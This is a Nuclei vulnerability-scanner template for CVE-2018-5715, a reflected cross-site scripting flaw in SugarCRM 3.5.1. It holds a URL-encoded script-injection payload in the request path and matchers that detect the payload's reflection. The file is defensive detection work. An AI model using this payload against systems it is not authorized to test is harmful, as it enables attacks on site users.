nuclei-templates/cves/2018/CVE-2018-5715.yaml

37 lines
935 B
YAML
Raw Normal View History

2022-04-24 13:40:22 +00:00
id: CVE-2018-5715
2022-04-24 13:39:12 +00:00
info:
name: SugarCRM 3.5.1 - Reflected XSS
author: edoardottt
severity: medium
description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-04-24 13:40:22 +00:00
cve-id: CVE-2018-5715
2022-04-24 13:39:12 +00:00
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-5715
- https://www.exploit-db.com/exploits/43683
2022-04-24 13:41:02 +00:00
tags: cve,cve2018,sugarcrm,xss
2022-04-24 13:39:12 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "\"/><script>alert(1)</script>"